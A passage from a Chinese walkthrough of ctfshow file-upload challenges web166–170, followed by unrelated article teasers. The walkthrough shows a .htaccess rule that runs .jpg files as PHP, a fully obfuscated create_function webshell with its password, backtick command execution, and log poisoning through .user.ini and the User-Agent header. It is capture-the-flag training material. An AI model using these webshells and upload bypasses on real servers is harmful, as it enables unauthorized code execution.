当前位置：首页 > news >正文

ctfshow-web入门-文件上传（web166、web167）（web168-web170）免杀绕过

news 2026/5/19 5:35:13

1、web166

2、web167

3、web168

4、web169

5、web170

1、web166

查看源码，前端只让传 zip

上传 zip 成功后可以进行下载

随便搞一个压缩包，使用记事本编辑，在其内容里插入一句话木马：

上传该压缩包，上传成功后点击下载文件，使用 burpsuite 抓包：

我这里木马内容用的 request ，就在 get 里执行 ls 没什么问题，但是读取 flag 时识别有点问题，最好使用 post 请求，因此将请求方法改为 post ，将 file 的内容还原到上面。

读取 flag：

ctfshow{f98c6ba4-e71a-46bf-b7c3-846db8cc08d7}

后面发现转为 get 方法其实也是可以的，注意添加一个加号进行拼接，而不是用空格：

2、web167

提示：httpd

.htaccess 文件是 Apache HTTP 服务器的目录级配置文件，它允许用户覆盖 Web 服务器的系统范围设置，而无需修改全局配置文件（例如 httpd.conf 或 apache2.conf）。

这里我们可以通过上传 .htaccess 文件，其内容设置如下：

<FilesMatch ".jpg">SetHandler application/x-httpd-php
</FilesMatch>

这里先改为 jpg 上传绕过前端限制后再改回 .htaccess 放包：

这个配置文件上传成功后，就会使 jpg 后缀的文件都被当做 php 文件解析。

接下来我们直接将一句话木马改为 jpg 后缀上传：

点击下载文件即可访问到一句话木马：

空白，说明上传解析成功。

调用：

看一下上层目录：

读取 flag.php：

拿到 flag：ctfshow{ba49b0f7-b8f9-447d-b1d3-118311c3d829}

3、web168

前端还是只能传 png

使用 burpsuite 抓包，改后缀重放回显 null

什么都没有回显

做了一下 fuzz 测试：

单个的字符都是没问题的，但是合在一起传的内容就有问题，并不是像前面对内容进行过滤那样简单，查看提示：基础免杀。

经过测试，正常内容可以上传，并且对 php 文件没有后缀限制：

文件会被上传到 upload 目录下：

phpinfo 也可以正常上传并解析：

无论是正常的 php 代码还是短标签的格式：

测试关键字：eval、system、assert、$_POST

均返回 null，猜测应该是过滤掉了一些危险函数和关键字

做了一下拼接绕过：

<?php$a="e"."v";$b="a"."l";$c=$a.$b;$c($_REQUEST['cmd']);
?>

但是访问的时候报错：

看来不光是过滤关键字，这些高位函数在 PHP 配置中也被禁用了。

在网上找到了一个免杀的木马：

<?php $bFIY=create_function(chr(25380/705).chr(92115/801).base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ=='),chr(0x16964/0x394).chr(0x6f16/0xf1).base64_decode('YQ==').base64_decode('bA==').chr(060340/01154).chr(01041-0775).base64_decode('cw==').str_rot13('b').chr(01504-01327).base64_decode('ZQ==').chr(057176/01116).chr(0xe3b4/0x3dc));$bFIY(base64_decode('NjgxO'.'Tc7QG'.'V2QWw'.'oJF9Q'.''.str_rot13('G').str_rot13('1').str_rot13('A').base64_decode('VQ==').str_rot13('J').''.''.chr(0x304-0x2d3).base64_decode('Ug==').chr(13197/249).str_rot13('F').base64_decode('MQ==').''.'B1bnR'.'VXSk7'.'MjA0N'.'TkxOw'.'=='.''));?>

连接密码: TyKPuntU

调用：

查看上一层目录：

TyKPuntU=system('ls ../');

存在 flag.php 和 flagaa.php，先读取 flag.php：

TyKPuntU=system('tac ../flag.php');

不是，那么再读取 flagaa.php：

TyKPuntU=system('tac ../flagaa.php');

拿到 flag：ctfshow{eec273d2-c16e-4772-bc11-b9d3587af55b}

如果这里不上一句话木马，我们还可以使用反引号来执行命令：

<?=`ls ..`;

读取 flag：

<?=`tac ../flagaa.php`;

4、web169

高级免杀

前端只能传 zip，抓包绕过即可

但是在后端上传发现不行，这段 unicode 编码在前面遇到过，文件类型没对。

需要修改 content-type 为：image/png

至于文件后缀并不影响，php 也可以：

测一下上一题的木马，过不了：

这里直接把尖括号（大于小于号）都给毙掉了：

想直接写进去很难了，采用日志文件包含：

先上传配置文件 .user.ini，也需要改文件类型为 png 图片类型

可以上传成功，再在 ua 头里面插入我们希望执行的 php代码，再次发送：

访问 upload 目录，返回 403，应该是 upload 目录下没有 php 文件：

我们随便传一个上去：

访问 /upload/1.php

遇到报错：

可能前面传得太乱了，重启容器，重新传 php 文件和配置文件：

再次访问 /upload/1.php，可以看到 ls ../ 执行成功：

读取 flag：

拿到 flag：ctfshow{5e939b5c-d235-43ae-9b2b-22c0387a9278}

5、web170

终极免杀

方法与上一题一样，也是采用日志包含。

传配置文件：

这里的 payload 就直接读 flag 了：

传 php 文件：

这次直接传 index.php，内容为空，一会儿直接访问 upload 目录即可看到回显。

拿到 flag：ctfshow{719e6a2b-7309-4fe1-964b-8ba79bcbb809}

CTFshow-Web 入门系列的文件上传至此结束。

Myon，2024.7.11

ctfshow-web入门-文件上传（web166、web167）（web168-web170）免杀绕过

目录 1、web166 2、web167 3、web168 4、web169 5、web170 1、web166 查看源码，前端只让传 zip 上传 zip 成功后可以进行下载随便搞一个压缩包，使用记事本编辑，在其内容里插入一句话木马： 上传该压缩包，上传成功…...

编程日记 2024/7/12 2:49:04

Jitsi Meet指定用户成为主持人

前言在Jitsi Meet进行会议的时候，我们有可能会使用到预约会议的这一个功能，预约会议的时候，我们希望我预约的会议，我就是主持人，而不希望其他人是主持人。但是Jitsi Meet默认会认为第一个进入房间的是主持人&#…...

编程日记 2024/7/12 2:48:03

MySQL慢查询日志详解与性能优化指南

1. 什么是慢查询日志慢查询日志是MySQL提供的一种日志记录功能，它能够记录执行时间超过预设阈值的SQL查询语句，并将这些信息写入到日志文件中。 2. 查看慢查询日志的设置和状态 2.1 慢查询日志的开启状态和日志文件位置通过以下命令可以查看慢查询…...

编程日记 2024/7/12 2:47:02

xml CDATA

]]>之间的任何内容标记为字符数据。内容不会被解释为标记。 <![CDATA[这里的任何文本，即使是也被解释为文本而不是起始标签]]> 这是什么意思? 这段描述解释了XML中CDATA部分的作用和用法。让我来详细解释一下： CDATA（Character Da…...

编程日记 2024/7/12 2:46:02

C++的线程管理

C的线程管理线程类（Thread）线程构造器约定构造器初始化构造器复制构造器移动构造器多线程atomiccondition_variable应用实列 futurepromise应用实列 future应用实列线程类（Thread） 执行线程是一个指令序列，它可以在…...

编程日记 2024/7/12 2:43:59

捷配笔记-如何设计PCB板布线满足生产标准？

PCB板布线是铺设连接各种设备与通电信号的路径的过程。PCB板布线是铺设连接各种设备与通电信号的路径的过程。在PCB设计中，布线是完成产品设计的重要步骤。可以说，之前的准备工作已经为它做好了。在整个PCB设计中，布线设计过程具有最高的极限…...

编程日记 2024/7/12 2:42:58

【Java数据结构】初识线性表之一：顺序表

使用Java简单实现一个顺序表顺序表是用一段物理地址连续的存储单元依次存储数据元素的线性结构，一般情况下采用数组存储。在数组上完成数据的增删查改。线性表大致包含如下的一些方法： public class MyArrayList { private int[] array; pri…...

编程日记 2024/7/12 2:41:57

高德开放平台API： https://lbs.amap.com/ 一、天气查询天气查询: https://lbs.amap.com/api/webservice/guide/api/weatherinfo adcode城市码表下载: https://lbs.amap.com/api/webservice/download Component public class WeatherUtil {Resourceprivate GdCon…...

编程日记 2024/7/12 2:39:55

Linux 初识

目录编辑 1.Linux发展史 1.1UNIX发展历史 1.2Linux发展历史 2.Linux的开源属性 2.1 开源软件的定义 2.2 Linux的开源许可证 2.3 开源社区与协作 3.Linux的企业应用现状 3.1 服务器 3.1.1 Web服务器 3.1.2 数据库服务器 3.1.3 文件服务器 3.1.4 电子邮件服务器 …...

编程日记 2024/7/12 2:38:52

CSS技巧专栏：一日一例 4.纯CSS实现两款流光溢彩的酷炫按钮特效

大家好，今天是 CSS技巧专栏：一日一例第三篇《纯CSS实现两款流光溢彩的酷炫按钮特效》先看图： 特此说明： 本专题专注于讲解如何使用CSS制作按钮特效。前置的准备工作和按钮的基本样式，都在本专栏第一篇文章中又详细…...

编程日记 2024/7/12 2:37:51

int类型变量表示范围的计算原理

文章目录 1. 了解2. 为什么通常情况下int类型整数的取值范围是-2147483648 ~ 21474836473. int类型究竟占几个字节4. 推荐 1. 了解通常情况下int类型变量占4个字节，1个字节有8位，每位都有0和1两种状态，所以int类型变量一共可以表示 2^32 种状…...

编程日记 2024/7/12 2:35:48

STM32崩溃问题排查

文章目录前言1. 问题说明2. STM32（Cortex M4内核）的寄存器3. 崩溃问题分析3.1 崩溃信息的来源是哪里？3.2 崩溃信息中的每个关键字代表的含义3.3 利用崩溃信息去查找造成崩溃的点3.4 keil5中怎么根据地址找到问题点3.5 keil5上编译时怎么输出…...

编程日记 2024/7/12 2:33:46

CSS 【详解】样式选择器（含ID、类、标签、通配、属性、伪类、伪元素、Content属性、子代、后代、兄弟、相邻兄弟、交集、并集等选择器）

CSS 样式选择器，用于选中页面中的 html 元素，以便添加 CSS 样式。按渲染性能由高到低依次是： ID 选择器 #id 通过元素的 id 属性选中元素，区分大小写 <p id"p1" >第一段</p>#p1{color: red; }但不推荐使…...

编程日记 2024/7/12 2:31:44

CMakeLists.txt编写思路

近期在linux编写CMakeLists.txt文件，整理了一些思路。一、编写CMakeLists.txt的基本步骤和思路： 初始化CMake： 使用cmake_minimum_required指令指定CMake的最小版本要求，以确保兼容性。使用project指令定义项目名称和可选的语言…...

编程日记 2024/7/12 2:29:42

红日靶场----（三）2.漏洞利用

上期的通过一句话木马实现对目标主机的持久后门我使用的是蚁剑，蚁剑安装及使用参考： 下载地址： GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器安装即使用： 1. 快速入门语雀通过YXCMS的后台GETSHELL 利用…...

编程日记 2024/7/12 2:28:41

LeetCode HOT100（三）滑动窗口

子数组最大平均数 I （非hot100，但是滑动窗口的思想可以很好的体现，入门滑动窗口很好的题） 给你一个由 n 个元素组成的整数数组 nums 和一个整数 k 。请你找出平均数最大且长度为 k 的连续子数组，并输出该最大平均数…...

编程日记 2024/7/12 2:27:40

数学系C++ 排序算法简述（八）

目录排序选择排序 O(n2) 不稳定：48429 归并排序 O(n log n) 稳定插入排序 O(n2) 堆排序 O(n log n) 希尔排序 O(n log2 n) 图书馆排序 O(n log n) 冒泡排序 O(n2) 优化： 基数排序 O(n k) 快速排序 O(n log n)【分治】不稳定桶排序 O(n…...

编程日记 2024/7/12 2:25:39

记一下blender曲线阵列

先说一下如何正常使用这个这一次我是用来贴瓷砖随便创建一个mesh 然后添加一个阵列修改器，然后再给他添加一个curve修改器，使用constant offset去偏移他这里有个小细节我第一次创建的curve 我选取之后，死活无法沿着曲线阵列&#xff…...

编程日记 2024/7/12 2:24:38

Windows电脑安装Python结合内网穿透轻松搭建可公网访问私有网盘

文章目录前言1.本地文件服务器搭建1.1.Python的安装和设置1.2.cpolar的安装和注册 2.本地文件服务器的发布2.1.Cpolar云端设置2.2.Cpolar本地设置 3.公网访问测试4.结语前言本文主要介绍如何在Windows系统电脑上使用python这样的简单程序语言，在自己的电脑上搭建…...

编程日记 2024/7/12 2:23:36

react hooks antd 父组件取子组件form表单的值

在React中，父组件可以使用ref来访问子组件的方法或属性。子组件包含一个表单， 使用forwardRef、useImperativeHandle：forwardRef允许组件使用ref将 DOM 节点暴露给父组件，使用useImperativeHandle暴露方法给父组件。子组件&#…...

编程日记 2024/7/12 2:20:33

终极ncmdumpGUI指南：3步快速解密网易云音乐NCM文件

终极ncmdumpGUI指南：3步快速解密网易云音乐NCM文件【免费下载链接】ncmdumpGUI C#版本网易云音乐ncm文件格式转换，Windows图形界面版本项目地址: https://gitcode.com/gh_mirrors/nc/ncmdumpGUI ncmdumpGUI是一款基于C#开发的Windows图形界面工…...

编程新知 2026/5/19 5:32:07

ARM NEON SIMD指令集：VMAX与VMIN向量运算详解

1. ARM SIMD指令集基础与向量运算概述在移动计算和嵌入式系统领域，ARM架构凭借其出色的能效比占据了主导地位。随着应用对计算性能需求的不断提升，SIMD（单指令多数据）技术成为提升处理器并行计算能力的关键手段。ARM的Advanced SI…...

编程新知 2026/5/19 5:21:56

Tracy安全最佳实践：开发与生产环境的安全配置指南

Tracy安全最佳实践：开发与生产环境的安全配置指南【免费下载链接】tracy 😎 Tracy: the addictive tool to ease debugging PHP code for cool developers. Friendly design, logging, profiler, advanced features like debugging AJAX calls or CLI s…...

编程新知 2026/5/19 4:19:00

完整教程：DIY-Multiprotocol-TX-Module固件编译与烧录

完整教程：DIY-Multiprotocol-TX-Module固件编译与烧录【免费下载链接】DIY-Multiprotocol-TX-Module Multiprotocol TX Module (or MULTI-Module) is a 2.4GHz transmitter module which controls many different receivers and models. 项目地址: https://gitco…...

编程新知 2026/5/19 4:16:52